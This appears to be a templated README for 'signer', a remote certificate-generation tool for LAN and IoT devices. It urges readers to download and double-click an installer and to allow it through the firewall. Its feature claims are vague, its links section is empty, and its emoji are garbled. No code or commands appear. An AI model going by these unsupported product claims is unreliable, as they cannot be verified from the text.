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πŸ” signer - Securely Sign and Generate Certificates

πŸš€ Getting Started

Welcome to signer! This application allows you to remotely generate and manage certificates for your secure devices. It makes it easy to ensure your connections are safe and trustworthy.

βš™οΈ System Requirements

To run signer, you will need:

  • Operating System: Windows, macOS, or Linux
  • RAM: At least 4 GB
  • Network Connection: Required for remote signing
  • Supported Browsers: Chrome, Firefox, or Safari

πŸ“¦ Download & Install

To download signer, visit this page to download:

Download signer

  1. Click the link above to go to the Releases page.
  2. Find the latest version of signer.
  3. Download the file suitable for your operating system.
  4. Once downloaded, double-click the file to install.

πŸ“„ Features

  • Remote Signing: Streamline certificate signing for LAN devices.
  • Certificate Generation: Easily create certificates for secure connections.
  • Compatibility: Works with popular IoT devices, including ESP32-S3.
  • User-Friendly Interface: Designed for ease of use, even without technical expertise.

πŸ”‘ Key Concepts

To help you understand how signer works, here are some simple explanations:

  • Certificate: A digital document that proves the identity of a device online.
  • CSR (Certificate Signing Request): A request sent to a certificate authority to get a certificate.
  • Root CA (Certificate Authority): The main entity that issues certificates to devices and users.
  • TLS (Transport Layer Security): A protocol that keeps your internet connection secure.

πŸ”— Useful Links

πŸ› οΈ Troubleshooting

If you run into issues while using signer, try these steps:

  1. Check Your Download: Ensure that the file downloaded completely.
  2. Firewall Settings: Make sure your firewall allows signer to connect to the internet.
  3. Reinstallation: If problems persist, uninstall signer and reinstall the latest version.

πŸ“œ License

signer is licensed under the MIT License. You can modify and share it, as long as you keep the same license.

πŸŽ‰ Conclusion

signer simplifies the process of certificate management for secure connections. By following the steps above, you'll be able to download, install, and use signer with ease. For deeper dives into features, refer to the documentation and community support links.

For your convenience, here is the download link again:

Download signer

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